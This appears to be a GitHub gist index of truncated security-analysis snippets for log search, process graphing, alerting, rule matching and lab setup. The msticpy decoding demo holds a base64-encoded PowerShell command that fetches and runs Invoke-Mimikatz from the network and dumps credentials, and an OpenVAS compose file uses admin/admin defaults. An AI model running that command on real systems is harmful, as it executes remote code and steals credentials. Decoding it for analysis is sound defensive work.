boredhackerblog BoredHackerBlog

@BoredHackerBlog
BoredHackerBlog / msticpy_b64_unpack.py
Last active May 17, 2022
base64 command line arg decoding with msticpy
from msticpy.nbtools import *
from msticpy.sectools import *
command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="
out = base64.unpack(command)
print(out[1]['decoded_string'][0])
# it should print
@BoredHackerBlog
BoredHackerBlog / pyspark_search.py
Last active Apr 30, 2022
apache spark / pyspark eve.json search
In [1]: from pyspark.sql import SparkSession
In [2]: spark = SparkSession \
   ...:     .builder \
   ...:     .appName("example") \
   ...:     .getOrCreate()
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
Setting default log level to "WARN".
@BoredHackerBlog
BoredHackerBlog / graph_proc.py
Created Feb 1, 2022
process graph using graphviz and python
from graphviz import Digraph
process_data = []
process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"})
process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"})
process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"})
process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"})
process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"})
def graph_process(jsonarray, pid_key, ppid_key, label_key):
@BoredHackerBlog
BoredHackerBlog / ghactions_docker_build.yaml
Last active Feb 1, 2022
github actions for docker containers
name: build and upload container
on:
  push:
    branches: [ main ]
jobs:
  build:
    runs-on: ubuntu-latest
View set_token.py
import requests
from time import sleep
while True:
    try:
        if requests.get("http://localhost:8080").status_code == 200:
            break
        else:
            sleep(5)
    except:
View docker-compose.yaml
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
version: "3"
services:
  openvas:
    ports:
      - "8080:9392"
    environment:
      - "PASSWORD=admin"
      - "USERNAME=admin"
@BoredHackerBlog
BoredHackerBlog / docker-compose.yaml
Last active Mar 22, 2022
grafana loki docker-compose file and vector settings
version: "3"
networks:
  loki:
services:
  loki:
    image: grafana/loki:2.4.0
    volumes:
      - ./loki:/etc/loki
View alert_app.py
from flask import request
from flask import Flask
import opsgenie_sdk
app = Flask(__name__)
og = opsgenie_sdk.configuration.Configuration()
og.api_key['Authorization'] = ""
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)
@BoredHackerBlog
BoredHackerBlog / 01-netcfg.yaml
Created Sep 12, 2021
netplan config for bridge, br0 can be used to sniff traffic between eth1, eth2
# root@host:~# cat /etc/netplan/01-netcfg.yaml
network:
  version: 2
  renderer: networkd
  ethernets:
    eth0:
      dhcp4: yes
    eth1:
      dhcp4: no
    eth2:
@BoredHackerBlog
BoredHackerBlog / rulematch.py
Created Sep 4, 2021
dict rule match - this code essentially takes in a bunch of rules and compares them against an event (dict) and prints if something matches
# requires dictquery (pip3 install dictquery or get it from here: https://github.com/cyberlis/dictquery)
import dictquery as dq
#each rule needs to be a new line
#rule format, RULENAME|RULE
#rule syntax: https://github.com/cyberlis/dictquery#dictquery
rules_file = "rules.txt"
rules = {}